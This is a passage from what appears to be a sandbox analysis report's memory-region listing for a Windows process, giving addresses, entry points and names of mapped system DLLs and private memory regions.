end_va = 0x7fefaf28fff
monitored = 0
entry_point = 0x7fefaf23668
region_type = mapped_file
name = "fvecerts.dll"
filename = "\\Windows\\System32\\fvecerts.dll" (normalized: "c:\\windows\\system32\\fvecerts.dll")
Region:
id = 4085
start_va = 0x7fefaf30000
end_va = 0x7fefaf38fff
monitored = 0
entry_point = 0x7fefaf31020
region_type = mapped_file
name = "tbs.dll"
filename = "\\Windows\\System32\\tbs.dll" (normalized: "c:\\windows\\system32\\tbs.dll")
Region:
id = 4086
start_va = 0x7fefaf40000
end_va = 0x7fefaf95fff
monitored = 0
entry_point = 0x7fefaf41040
region_type = mapped_file
name = "fveapi.dll"
filename = "\\Windows\\System32\\fveapi.dll" (normalized: "c:\\windows\\system32\\fveapi.dll")
Region:
id = 4087
start_va = 0x7fefafa0000
end_va = 0x7fefaffdfff
monitored = 0
entry_point = 0x7fefafa9024
region_type = mapped_file
name = "shsvcs.dll"
filename = "\\Windows\\System32\\shsvcs.dll" (normalized: "c:\\windows\\system32\\shsvcs.dll")
Region:
id = 4088
start_va = 0x7fefb640000
end_va = 0x7fefb653fff
monitored = 0
entry_point = 0x7fefb643e64
region_type = mapped_file
name = "sens.dll"
filename = "\\Windows\\System32\\Sens.dll" (normalized: "c:\\windows\\system32\\sens.dll")
Region:
id = 4089
start_va = 0x7fefb6a0000
end_va = 0x7fefb706fff
monitored = 0
entry_point = 0x7fefb6b6060
region_type = mapped_file
name = "es.dll"
filename = "\\Windows\\System32\\es.dll" (normalized: "c:\\windows\\system32\\es.dll")
Region:
id = 4090
start_va = 0x7fefb720000
end_va = 0x7fefb72afff
monitored = 0
entry_point = 0x7fefb724f8c
region_type = mapped_file
name = "slc.dll"
filename = "\\Windows\\System32\\slc.dll" (normalized: "c:\\windows\\system32\\slc.dll")
Region:
id = 4091
start_va = 0x7fefb730000
end_va = 0x7fefb73bfff
monitored = 0
entry_point = 0x7fefb7315d8
region_type = mapped_file
name = "dsrole.dll"
filename = "\\Windows\\System32\\dsrole.dll" (normalized: "c:\\windows\\system32\\dsrole.dll")
Region:
id = 4092
start_va = 0x7fefb740000
end_va = 0x7fefb74ffff
monitored = 0
entry_point = 0x7fefb74835c
region_type = mapped_file
name = "themeservice.dll"
filename = "\\Windows\\System32\\themeservice.dll" (normalized: "c:\\windows\\system32\\themeservice.dll")
Region:
id = 4093
start_va = 0x7fefb750000
end_va = 0x7fefb768fff
monitored = 0
entry_point = 0x7fefb7511a8
region_type = mapped_file
name = "atl.dll"
filename = "\\Windows\\System32\\atl.dll" (normalized: "c:\\windows\\system32\\atl.dll")
Region:
id = 4094
start_va = 0x7fefb770000
end_va = 0x7fefb7a6fff
monitored = 0
entry_point = 0x7fefb778424
region_type = mapped_file
name = "profsvc.dll"
filename = "\\Windows\\System32\\profsvc.dll" (normalized: "c:\\windows\\system32\\profsvc.dll")
Region:
id = 4095
start_va = 0x7fefb7f0000
end_va = 0x7fefb804fff
monitored = 0
entry_point = 0x7fefb7f60d8
region_type = mapped_file
name = "nlaapi.dll"
filename = "\\Windows\\System32\\nlaapi.dll" (normalized: "c:\\windows\\system32\\nlaapi.dll")
Region:
id = 4096
start_va = 0x7fefb810000
end_va = 0x7fefb8d1fff
monitored = 0
entry_point = 0x7fefb81101c
region_type = mapped_file
name = "gpsvc.dll"
filename = "\\Windows\\System32\\gpsvc.dll" (normalized: "c:\\windows\\system32\\gpsvc.dll")
Region:
id = 4097
start_va = 0x7fefbaf0000
end_va = 0x7fefbb0cfff
monitored = 0
entry_point = 0x7fefbaf2f18
region_type = mapped_file
name = "mmcss.dll"
filename = "\\Windows\\System32\\mmcss.dll" (normalized: "c:\\windows\\system32\\mmcss.dll")
Region:
id = 4098
start_va = 0x7fefbb10000
end_va = 0x7fefbb18fff
monitored = 0
entry_point = 0x7fefbb11010
region_type = mapped_file
name = "avrt.dll"
filename = "\\Windows\\System32\\avrt.dll" (normalized: "c:\\windows\\system32\\avrt.dll")
Region:
id = 4099
start_va = 0x7fefbc00000
end_va = 0x7fefbc2cfff
monitored = 0
entry_point = 0x7fefbc01010
region_type = mapped_file
name = "ntmarta.dll"
filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll")
Region:
id = 4100
start_va = 0x7fefbda0000
end_va = 0x7fefbdb4fff
monitored = 0
entry_point = 0x7fefbda1050
region_type = mapped_file
name = "wkscli.dll"
filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll")
Region:
id = 4101
start_va = 0x7fefbdc0000
end_va = 0x7fefbdcbfff
monitored = 0
entry_point = 0x7fefbdc18a4
region_type = mapped_file
name = "netutils.dll"
filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll")
Region:
id = 4102
start_va = 0x7fefbdd0000
end_va = 0x7fefbde5fff
monitored = 0
entry_point = 0x7fefbdd11a0
region_type = mapped_file
name = "netapi32.dll"
filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll")
Region:
id = 4103
start_va = 0x7fefbf00000
end_va = 0x7fefbf10fff
monitored = 0
entry_point = 0x7fefbf01070
region_type = mapped_file
name = "wtsapi32.dll"
filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll")
Region:
id = 4104
start_va = 0x7fefc060000
end_va = 0x7fefc094fff
monitored = 0
entry_point = 0x7fefc061064
region_type = mapped_file
name = "xmllite.dll"
filename = "\\Windows\\System32\\xmllite.dll" (normalized: "c:\\windows\\system32\\xmllite.dll")
Region:
id = 4105
start_va = 0x7fefc4d0000
end_va = 0x7fefc525fff
monitored = 0
entry_point = 0x7fefc4dbbc0
region_type = mapped_file
name = "uxtheme.dll"
filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll")
Region:
id = 4106
start_va = 0x7fefc530000
end_va = 0x7fefc65bfff
monitored = 0
entry_point = 0x7fefc5394bc
region_type = mapped_file
name = "propsys.dll"
filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll")
Region:
id = 4107
start_va = 0x7fefc660000
end_va = 0x7fefc67cfff
monitored = 0
entry_point = 0x7fefc661ef4
region_type = mapped_file
name = "samlib.dll"
filename = "\\Windows\\System32\\samlib.dll" (normalized: "c:\\windows\\system32\\samlib.dll")
Region:
id = 4108
start_va = 0x7fefc6b0000
end_va = 0x7fefc8a3fff
monitored = 0
entry_point = 0x7fefc83c924
region_type = mapped_file
name = "comctl32.dll"
filename = "\\Windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\\comctl32.dll")
Region:
id = 4109
start_va = 0x7fefcd40000
end_va = 0x7fefcd4bfff
monitored = 0
entry_point = 0x7fefcd41064
region_type = mapped_file
name = "version.dll"
filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll")
Region:
id = 4110
start_va = 0x7fefce10000
end_va = 0x7fefce16fff
monitored = 0
entry_point = 0x7fefce114b0
region_type = mapped_file
name = "wshtcpip.dll"
filename = "\\Windows\\System32\\WSHTCPIP.DLL" (normalized: "c:\\windows\\system32\\wshtcpip.dll")
Region:
id = 4111
start_va = 0x7fefced0000
end_va = 0x7fefcedcfff
monitored = 0
entry_point = 0x7fefced1348
region_type = mapped_file
name = "pcwum.dll"
filename = "\\Windows\\System32\\pcwum.dll" (normalized: "c:\\windows\\system32\\pcwum.dll")
Region:
id = 4112
start_va = 0x7fefcf10000
end_va = 0x7fefcf2afff
monitored = 0
entry_point = 0x7fefcf12068
region_type = mapped_file
name = "gpapi.dll"
filename = "\\Windows\\System32\\gpapi.dll" (normalized: "c:\\windows\\system32\\gpapi.dll")
Region:
id = 4113
start_va = 0x7fefcf30000
end_va = 0x7fefcf4dfff
monitored = 0
entry_point = 0x7fefcf313b8
region_type = mapped_file
name = "userenv.dll"
filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll")
Region:
id = 4114
start_va = 0x7fefd000000
end_va = 0x7fefd038fff
monitored = 0
entry_point = 0x7fefd00c0f0
region_type = mapped_file
name = "ubpm.dll"
filename = "\\Windows\\System32\\ubpm.dll" (normalized: "c:\\windows\\system32\\ubpm.dll")
Region:
id = 4115
start_va = 0x7fefd050000
end_va = 0x7fefd059fff
monitored = 0
entry_point = 0x7fefd053b40
region_type = mapped_file
name = "sysntfy.dll"
filename = "\\Windows\\System32\\sysntfy.dll" (normalized: "c:\\windows\\system32\\sysntfy.dll")
Region:
id = 4116
start_va = 0x7fefd060000
end_va = 0x7fefd069fff
monitored = 0
entry_point = 0x7fefd063cb8
region_type = mapped_file
name = "credssp.dll"
filename = "\\Windows\\System32\\credssp.dll" (normalized: "c:\\windows\\system32\\credssp.dll")
Region:
id = 4117
start_va = 0x7fefd190000
end_va = 0x7fefd1d6fff
monitored = 0
entry_point = 0x7fefd191064
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll")
Region:
id = 4118
start_va = 0x7fefd280000
end_va = 0x7fefd2affff
monitored = 0
entry_point = 0x7fefd28194c
region_type = mapped_file
name = "logoncli.dll"
filename = "\\Windows\\System32\\logoncli.dll" (normalized: "c:\\windows\\system32\\logoncli.dll")
Region:
id = 4119
start_va = 0x7fefd420000
end_va = 0x7fefd426fff
monitored = 0
entry_point = 0x7fefd42142c
region_type = mapped_file
name = "wship6.dll"
filename = "\\Windows\\System32\\wship6.dll" (normalized: "c:\\windows\\system32\\wship6.dll")
Region:
id = 4120
start_va = 0x7fefd430000
end_va = 0x7fefd484fff
monitored = 0
entry_point = 0x7fefd431054
region_type = mapped_file
name = "mswsock.dll"
filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll")
Region:
id = 4121
start_va = 0x7fefd490000
end_va = 0x7fefd4a7fff
monitored = 0
entry_point = 0x7fefd493b48
region_type = mapped_file
name = "cryptsp.dll"
filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll")
Region:
id = 4122
start_va = 0x7fefd5a0000
end_va = 0x7fefd5d1fff
monitored = 0
entry_point = 0x7fefd5a144c
region_type = mapped_file
name = "netjoin.dll"
filename = "\\Windows\\System32\\netjoin.dll" (normalized: "c:\\windows\\system32\\netjoin.dll")
Region:
id = 4123
start_va = 0x7fefd660000
end_va = 0x7fefd68efff
monitored = 0
entry_point = 0x7fefd661064
region_type = mapped_file
name = "authz.dll"
filename = "\\Windows\\System32\\authz.dll" (normalized: "c:\\windows\\system32\\authz.dll")
Region:
id = 4124
start_va = 0x7fefd6a0000
end_va = 0x7fefd70cfff
monitored = 0
entry_point = 0x7fefd6a1010
region_type = mapped_file
name = "wevtapi.dll"
filename = "\\Windows\\System32\\wevtapi.dll" (normalized: "c:\\windows\\system32\\wevtapi.dll")
Region:
id = 4125
start_va = 0x7fefd970000
end_va = 0x7fefd992fff
monitored = 0
entry_point = 0x7fefd971198
region_type = mapped_file
name = "srvcli.dll"
filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll")
Region:
id = 4126
start_va = 0x7fefda10000
end_va = 0x7fefda1afff
monitored = 0
entry_point = 0x7fefda11030
region_type = mapped_file
name = "secur32.dll"
filename = "\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll")
Region:
id = 4127
start_va = 0x7fefda40000
end_va = 0x7fefda64fff
monitored = 0
entry_point = 0x7fefda49658
region_type = mapped_file
name = "sspicli.dll"
filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll")
Region:
id = 4128
start_va = 0x7fefda70000
end_va = 0x7fefda7efff
monitored = 0
entry_point = 0x7fefda71010
region_type = mapped_file
name = "cryptbase.dll"
filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll")
Region:
id = 4129
start_va = 0x7fefda80000
end_va = 0x7fefdb10fff
monitored = 0
entry_point = 0x7fefda81440
region_type = mapped_file
name = "sxs.dll"
filename = "\\Windows\\System32\\sxs.dll" (normalized: "c:\\windows\\system32\\sxs.dll")
Region:
id = 4130
start_va = 0x7fefdb20000
end_va = 0x7fefdb5cfff
monitored = 0
entry_point = 0x7fefdb218f4
region_type = mapped_file
name = "winsta.dll"
filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll")
Region:
id = 4131
start_va = 0x7fefdb60000
end_va = 0x7fefdb73fff
monitored = 0
entry_point = 0x7fefdb610e0
region_type = mapped_file
name = "rpcrtremote.dll"
filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll")
Region:
id = 4132
start_va = 0x7fefdb80000
end_va = 0x7fefdb8efff
monitored = 0
entry_point = 0x7fefdb819b0
region_type = mapped_file
name = "profapi.dll"
filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll")
Region:
id = 4133
start_va = 0x7fefdc20000
end_va = 0x7fefdc2efff
monitored = 0
entry_point = 0x7fefdc21020
region_type = mapped_file
name = "msasn1.dll"
filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll")
Region:
id = 4134
start_va = 0x7fefdcd0000
end_va = 0x7fefdce9fff
monitored = 0
entry_point = 0x7fefdcd1558
region_type = mapped_file
name = "devobj.dll"
filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll")
Region:
id = 4135
start_va = 0x7fefdcf0000
end_va = 0x7fefdd2afff
monitored = 0
entry_point = 0x7fefdcf1324
region_type = mapped_file
name = "wintrust.dll"
filename = "\\Windows\\System32\\wintrust.dll" (normalized: "c:\\windows\\system32\\wintrust.dll")
Region:
id = 4136
start_va = 0x7fefdd30000
end_va = 0x7fefdd9bfff
monitored = 0
entry_point = 0x7fefdd32780
region_type = mapped_file
name = "kernelbase.dll"
filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll")
Region:
id = 4137
start_va = 0x7fefdda0000
end_va = 0x7fefddd5fff
monitored = 0
entry_point = 0x7fefdda1474
region_type = mapped_file
name = "cfgmgr32.dll"
filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll")
Region:
id = 4138
start_va = 0x7fefdde0000
end_va = 0x7fefdf4cfff
monitored = 0
entry_point = 0x7fefdde10b4
region_type = mapped_file
name = "crypt32.dll"
filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll")
Region:
id = 4139
start_va = 0x7fefdf50000
end_va = 0x7fefdf5dfff
monitored = 0
entry_point = 0x7fefdf51080
region_type = mapped_file
name = "lpk.dll"
filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll")
Region:
id = 4140
start_va = 0x7fefdf60000
end_va = 0x7fefdf67fff
monitored = 0
entry_point = 0x7fefdf61504
region_type = mapped_file
name = "nsi.dll"
filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll")
Region:
id = 4141
start_va = 0x7fefe0a0000
end_va = 0x7fefe106fff
monitored = 0
entry_point = 0x7fefe0ab03c
region_type = mapped_file
name = "gdi32.dll"
filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll")
Region:
id = 4142
start_va = 0x7fefe110000
end_va = 0x7fefe161fff
monitored = 0
entry_point = 0x7fefe1110d4
region_type = mapped_file
name = "wldap32.dll"
filename = "\\Windows\\System32\\Wldap32.dll" (normalized: "c:\\windows\\system32\\wldap32.dll")
Region:
id = 4143
start_va = 0x7fefe170000
end_va = 0x7fefe208fff
monitored = 0
entry_point = 0x7fefe171c10
region_type = mapped_file
name = "clbcatq.dll"
filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll")
Region:
id = 4144
start_va = 0x7fefe210000
end_va = 0x7fefe280fff
monitored = 0
entry_point = 0x7fefe221e20
region_type = mapped_file
name = "shlwapi.dll"
filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll")
Region:
id = 4145
start_va = 0x7fefe4f0000
end_va = 0x7feff277fff
monitored = 0
entry_point = 0x7fefe56cebc
region_type = mapped_file
name = "shell32.dll"
filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll")
Region:
id = 4146
start_va = 0x7feff320000
end_va = 0x7feff3fafff
monitored = 0
entry_point = 0x7feff340760
region_type = mapped_file
name = "advapi32.dll"
filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll")
Region:
id = 4147
start_va = 0x7feff400000
end_va = 0x7feff41efff
monitored = 0
entry_point = 0x7feff4060e8
region_type = mapped_file
name = "sechost.dll"
filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll")
Region:
id = 4148
start_va = 0x7feff420000
end_va = 0x7feff528fff
monitored = 0
entry_point = 0x7feff421064
region_type = mapped_file
name = "msctf.dll"
filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll")
Region:
id = 4149
start_va = 0x7feff530000
end_va = 0x7feff5f8fff
monitored = 0
entry_point = 0x7feff5aa874
region_type = mapped_file
name = "usp10.dll"
filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll")
Region:
id = 4150
start_va = 0x7feff600000
end_va = 0x7feff6d6fff
monitored = 0
entry_point = 0x7feff603274
region_type = mapped_file
name = "oleaut32.dll"
filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll")
Region:
id = 4151
start_va = 0x7feff6e0000
end_va = 0x7feff77efff
monitored = 0
entry_point = 0x7feff6e25a0
region_type = mapped_file
name = "msvcrt.dll"
filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll")
Region:
id = 4152
start_va = 0x7feff780000
end_va = 0x7feff982fff
monitored = 0
entry_point = 0x7feff7a3330
region_type = mapped_file
name = "ole32.dll"
filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll")
Region:
id = 4153
start_va = 0x7feff990000
end_va = 0x7feffb66fff
monitored = 0
entry_point = 0x7feff991010
region_type = mapped_file
name = "setupapi.dll"
filename = "\\Windows\\System32\\setupapi.dll" (normalized: "c:\\windows\\system32\\setupapi.dll")
Region:
id = 4154
start_va = 0x7feffb70000
end_va = 0x7feffb9dfff
monitored = 0
entry_point = 0x7feffb71010
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll")
Region:
id = 4155
start_va = 0x7feffba0000
end_va = 0x7feffcccfff
monitored = 0
entry_point = 0x7feffbeed50
region_type = mapped_file
name = "rpcrt4.dll"
filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll")
Region:
id = 4156
start_va = 0x7feffcd0000
end_va = 0x7feffd1cfff
monitored = 0
entry_point = 0x7feffcd1070
region_type = mapped_file
name = "ws2_32.dll"
filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll")
Region:
id = 4157
start_va = 0x7fefff50000
end_va = 0x7fefff50fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "apisetschema.dll"
filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll")
Region:
id = 4158
start_va = 0x7fffff96000
end_va = 0x7fffff97fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffff96000"
filename = ""
Region:
id = 4159
start_va = 0x7fffff98000
end_va = 0x7fffff99fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffff98000"
filename = ""
Region:
id = 4160
start_va = 0x7fffff9a000
end_va = 0x7fffff9bfff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffff9a000"
filename = ""
Region:
id = 4161
start_va = 0x7fffff9c000
end_va = 0x7fffff9dfff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffff9c000"
filename = ""
Region:
id = 4162
start_va = 0x7fffff9e000
end_va = 0x7fffff9ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffff9e000"
filename = ""
Region:
id = 4163
start_va = 0x7fffffa0000
end_va = 0x7fffffa1fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffa0000"
filename = ""
Region:
id = 4164
start_va = 0x7fffffa2000
end_va = 0x7fffffa3fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffa2000"
filename = ""
Region:
id = 4165
start_va = 0x7fffffa4000
end_va = 0x7fffffa5fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffa4000"
filename = ""
Region:
id = 4166
start_va = 0x7fffffa6000
end_va = 0x7fffffa7fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffa6000"
filename = ""
Region:
id = 4167
start_va = 0x7fffffa8000
end_va = 0x7fffffa9fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffa8000"
filename = ""
Region:
id = 4168
start_va = 0x7fffffaa000
end_va = 0x7fffffabfff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffaa000"
filename = ""
Region:
id = 4169
start_va = 0x7fffffac000
end_va = 0x7fffffadfff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffac000"
filename = ""
Region:
id = 4170
start_va = 0x7fffffae000
end_va = 0x7fffffaffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffae000"
filename = ""
Region:
id = 4171
start_va = 0x7fffffb0000
end_va = 0x7fffffd2fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000007fffffb0000"
filename = ""
Region:
id = 4172
start_va = 0x7fffffd3000
end_va = 0x7fffffd4fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffd3000"
filename = ""
Region:
id = 4173
start_va = 0x7fffffd5000
end_va = 0x7fffffd6fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffd5000"
filename = ""
Region:
id = 4174
start_va = 0x7fffffd7000
end_va = 0x7fffffd8fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffd7000"
filename = ""
Region:
id = 4175
start_va = 0x7fffffd9000
end_va = 0x7fffffdafff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffd9000"
filename = ""
Region:
id = 4176
start_va = 0x7fffffdb000
end_va = 0x7fffffdcfff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffdb000"
filename = ""
Region:
id = 4177
start_va = 0x7fffffdd000
end_va = 0x7fffffdefff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffdd000"
filename = ""
Region:
id = 4178
start_va = 0x7fffffdf000
end_va = 0x7fffffdffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffdf000"
filename = ""
Region:
id = 4206
start_va = 0x1e10000
end_va = 0x1e8ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001e10000"
filename = ""
Region:
id = 4207
start_va = 0x7fffff94000
end_va = 0x7fffff95fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffff94000"
filename = ""
Region:
id = 4208
start_va = 0xa60000
end_va = 0xa6ffff
monitored = 0
entry_point = 0xa63e64
region_type = mapped_file
name = "sens.dll"
filename = "\\Windows\\System32\\Sens.dll" (normalized: "c:\\windows\\system32\\sens.dll")
Region:
id = 4209
start_va = 0x10a0000
end_va = 0x111ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000010a0000"
filename = ""
Region:
id = 4210
start_va = 0xa70000
end_va = 0xa73fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "stdole2.tlb"
filename = "\\Windows\\System32\\stdole2.tlb" (normalized: "c:\\windows\\system32\\stdole2.tlb")
Region:
id = 4211
start_va = 0xa60000
end_va = 0xa6ffff
monitored = 0
entry_point = 0xa63e64
region_type = mapped_file
name = "sens.dll"
filename = "\\Windows\\System32\\Sens.dll" (normalized: "c:\\windows\\system32\\sens.dll")
Region:
id = 4212
start_va = 0xa70000
end_va = 0xa73fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "stdole2.tlb"
filename = "\\Windows\\System32\\stdole2.tlb" (normalized: "c:\\windows\\system32\\stdole2.tlb")
Region:
id = 4213
start_va = 0x1e70000
end_va = 0x1eeffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001e70000"
filename = ""
Region:
id = 4214
start_va = 0x7fefa2e0000
end_va = 0x7fefa319fff
monitored = 0
entry_point = 0x7fefa2fd020
region_type = mapped_file
name = "wmisvc.dll"
filename = "\\Windows\\System32\\wbem\\WMIsvc.dll" (normalized: "c:\\windows\\system32\\wbem\\wmisvc.dll")
Region:
id = 4215
start_va = 0x7fffff92000
end_va = 0x7fffff93fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffff92000"
filename = ""
Region:
id = 4216
start_va = 0x7fefa260000
end_va = 0x7fefa2d6fff
monitored = 0
entry_point = 0x7fefa29e7f0
region_type = mapped_file
name = "wbemcomn2.dll"
filename = "\\Windows\\System32\\wbemcomn2.dll" (normalized: "c:\\windows\\system32\\wbemcomn2.dll")
Region:
id = 4217
start_va = 0x7fefd5e0000
end_va = 0x7fefd601fff
monitored = 0
entry_point = 0x7fefd5e5d30
region_type = mapped_file
name = "bcrypt.dll"
filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll")
Region:
id = 4230
start_va = 0x1db0000
end_va = 0x1e2ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001db0000"
filename = ""
Region:
id = 4231
start_va = 0x7fefa050000
end_va = 0x7fefa08cfff
monitored = 0
entry_point = 0x7fefa051070
region_type = mapped_file
name = "srvsvc.dll"
filename = "\\Windows\\System32\\srvsvc.dll" (normalized: "c:\\windows\\system32\\srvsvc.dll")
Region:
id = 4232
start_va = 0x7fffff90000
end_va = 0x7fffff91fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffff90000"
filename = ""
Region:
id = 4233
start_va = 0x7fefb670000
end_va = 0x7fefb696fff
monitored = 0
entry_point = 0x7fefb6798bc
region_type = mapped_file
name = "iphlpapi.dll"
filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll")
Region:
id = 4234
start_va = 0x7fefb660000
end_va = 0x7fefb66afff
monitored = 0
entry_point = 0x7fefb661198
region_type = mapped_file
name = "winnsi.dll"
filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll")
Region:
id = 4235
start_va = 0x7fefa020000
end_va = 0x7fefa044fff
monitored = 0
entry_point = 0x7fefa038c54
region_type = mapped_file
name = "browser.dll"
filename = "\\Windows\\System32\\browser.dll" (normalized: "c:\\windows\\system32\\browser.dll")
Region:
id = 4236
start_va = 0x1f80000
end_va = 0x1ffffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001f80000"
filename = ""
Region:
id = 4237
start_va = 0x7fef9f80000
end_va = 0x7fefa011fff
monitored = 0
entry_point = 0x7fef9ff51ec
region_type = mapped_file
name = "iphlpsvc.dll"
filename = "\\Windows\\System32\\iphlpsvc.dll" (normalized: "c:\\windows\\system32\\iphlpsvc.dll")
Region:
id = 4238
start_va = 0x7fffff8e000
end_va = 0x7fffff8ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffff8e000"
filename = ""
Region:
id = 4239
start_va = 0x7fefcd50000
end_va = 0x7fefce0afff
monitored = 0
entry_point = 0x7fefcd56de0
region_type = mapped_file
name = "firewallapi.dll"
filename = "\\Windows\\System32\\FirewallAPI.dll" (normalized: "c:\\windows\\system32\\firewallapi.dll")
Region:
id = 4240
start_va = 0x7fefb050000
end_va = 0x7fefb0a2fff
monitored = 0
entry_point = 0x7fefb052b98
region_type = mapped_file
name = "fwpuclnt.dll"
filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll")
Region:
id = 4241
start_va = 0x7fefbc30000
end_va = 0x7fefbc40fff
monitored = 0
entry_point = 0x7fefbc314c0
region_type = mapped_file
name = "rtutils.dll"
filename = "\\Windows\\System32\\rtutils.dll" (normalized: "c:\\windows\\system32\\rtutils.dll")
Region:
id = 4242
start_va = 0x7fef9f30000
end_va = 0x7fef9f71fff
monitored = 0
entry_point = 0x7fef9f317e4
region_type = mapped_file
name = "sqmapi.dll"
filename = "\\Windows\\System32\\sqmapi.dll" (normalized: "c:\\windows\\system32\\sqmapi.dll")
Region:
id = 4243
start_va = 0x7fef9ee0000
end_va = 0x7fef9f26fff
monitored = 0
entry_point = 0x7fef9ee1040
region_type = mapped_file
name = "wdscore.dll"
filename = "\\Windows\\System32\\wdscore.dll" (normalized: "c:\\windows\\system32\\wdscore.dll")
Region:
id = 4244
start_va = 0x2000000
